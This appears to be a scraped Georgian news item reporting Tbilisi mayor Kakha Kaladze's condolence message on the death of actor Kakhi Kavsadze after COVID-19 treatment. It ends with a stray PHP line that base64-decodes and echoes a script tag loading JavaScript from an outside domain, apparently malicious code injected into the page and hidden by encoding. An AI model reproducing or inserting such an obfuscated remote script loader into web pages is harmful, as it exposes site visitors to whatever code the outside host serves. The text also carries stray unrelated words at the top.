celsiusi
ავერსი საქკაბელი
დედაქააქის მერი, კახი კავსაძის გარდაცვალების შესახებ სოციალურ ქსელში ემოციურ განცხადებას ავრცელებს და ქვეყანას და ოჯახს სამძიმარს უცხადებს. 
 
"ვწუხვარ და გული მტკივა, რომ ამ სიტყვების თქმა მიწევს - კახი კავსაძე, ყველასთვის საყვარელი ადამიანი, გამორჩეული, კოლორიტული მსახიობი, საპატიო თბილისელი, უბრალოდ, ჩვენი უფროსი მეგობარი აღარ არის. 
 
კაცი, რომელმაც არა მარტო თავისი არაჩვეულებრივი როლებით და არტისტიზმით, არამედ უპირველესად საკუთარი ღირსებით, პიროვნული ხიბლით სამუდამო კვალი დატოვა. 
 
ძნელია, ვიპოვო სანუგეშო სიტყვები მისი ოჯახისთვის, მეგობრებისთვის, თანაქალაქელებისთვის. 
ვიზიარებ მთელი საქართველოს მწუხარებას!"- წერს კახა კალაძე. 
 
 
შეგახსენებთ, რომ მსახიობი ბოლო ორი თვის განმავლობაში, პირველ საუნივერსიტეტო კლინიკაში მკურნალობდა. კახი კავსაძეს კორონავირუსი 2020 წლის 28 ნოემბერს დაუდგინდა. რამდენიმე კვირიანი მკურნალობის შემდეგ მსახიობი ბინაზე გაწერეს, თუმცა მისი საავადმყოფოში დაბრუნება ჯანმრთელობის გაუარესების გამო კვლავ გახდა საჭირო. მსახიობი დღეს გარდაიცვალა. 
 
1263
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");